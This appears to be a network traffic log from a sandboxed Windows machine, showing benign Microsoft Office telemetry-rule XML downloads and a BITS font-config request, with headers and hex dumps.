2024-12-08 12:31:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:30 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123130Z-r1cf579d778bb9vvhC1EWRs954000000050g000000001f4r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:31 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49786	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:31 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-08 12:31:31 UTC	479	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=220674 Date: Sun, 08 Dec 2024 12:31:31 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.6	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:31 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123132Z-r1cf579d778zvkpnhC1EWRv23g00000005n0000000003gta x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.6	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:32 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:32 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123132Z-r1cf579d778x776bhC1EWRdk8000000005fg000000000362 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:32 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.6	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:32 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:32 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123132Z-r1cf579d778d5zkmhC1EWRk6h800000005x0000000000np4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:33 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.6	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:32 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:33 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 4c33d105-301e-003f-6b44-49266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123133Z-r1cf579d778qlpkrhC1EWRpfc80000000640000000000k3s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:33 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:32 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:33 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123133Z-r1cf579d778t6txphC1EWRsd4400000005sg000000004nnz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:33 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	49795	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:33 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-08 12:31:33 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=119703 Date: Sun, 08 Dec 2024 12:31:33 GMT Content-Length: 55 Connection: close X-CID: 2
2024-12-08 12:31:33 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:33 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:34 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 549300b5-601e-000d-6903-482618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123134Z-r1cf579d778mvsklhC1EWRkavg00000005ng000000002h0f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:34 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.6	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:34 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:34 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: d196cbd9-901e-008f-5d03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123134Z-r1cf579d778dc6d7hC1EWR2vs800000005z0000000004du1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:35 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.6	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:35 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:35 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: d196cbda-901e-008f-5e03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123135Z-r1cf579d778d5zkmhC1EWRk6h800000005t00000000042q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:35 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.6	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:35 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:35 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e267231f-301e-0099-3103-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123135Z-r1cf579d778qlpkrhC1EWRpfc8000000063g00000000105d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:35 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:35 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:35 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: c11f8514-901e-0048-1305-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123135Z-r1cf579d778v97q7hC1EWRf95c0000000500000000002qaz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:36 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
